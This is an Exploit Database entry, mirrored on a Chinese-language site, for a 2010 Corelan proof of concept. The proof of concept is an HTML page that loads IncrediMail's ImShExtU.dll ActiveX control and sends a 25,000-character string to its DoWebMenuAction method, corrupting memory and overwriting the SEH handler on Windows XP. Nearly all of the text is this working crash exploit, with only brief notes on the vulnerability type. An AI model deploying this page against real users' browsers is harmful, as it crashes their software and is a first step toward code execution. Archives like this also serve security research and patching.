IncrediMail – ‘ImShExtU.dll’ ActiveX Memory Corruption

• Exploit Database
• 109 阅读

• 作者： Lincoln
  日期： 2010-05-14
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12605/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51

  <html> <!-- |------------------------------------------------------------------| | __ __| | _________________/ /___ _____ / /________ _____ ___| |/ ___/ __ \/ ___/ _ \/ / __ <code>/ __ \ / __/ _ \/ __ </code>/ __ `__ \ | | / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / | | \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/| || | http://www.corelan.be:8800 | |security@corelan.be | || |-------------------------------------------------[ EIP Hunters ]--|   # Software: Incredimail (ImShExtU.dll) # Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-038 # Author: Lincoln # OS: Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln: SEH # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided &apos;as is&apos;, without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. # #0013F1A4 41414141AAAA #0013F1A8 41414141AAAA #0013F1AC 41414141AAAAPointer to next SEH record #0013F1B0 41414141AAAASE handler #0013F1B4 41414141AAAA #0013F1B8 41414141AAAA # -->   <object classid=&apos;clsid:F8984111-38B6-11D5-8725-0050DA2761C4&apos; id=&apos;target&apos; ></object> <script language=&apos;vbscript&apos;>     crash=String(25000, "A") target.DoWebMenuAction crash     </script> <b><center>IncrediMail ImShExtU.dll ActiveX Memory Corruption</b></center> </html>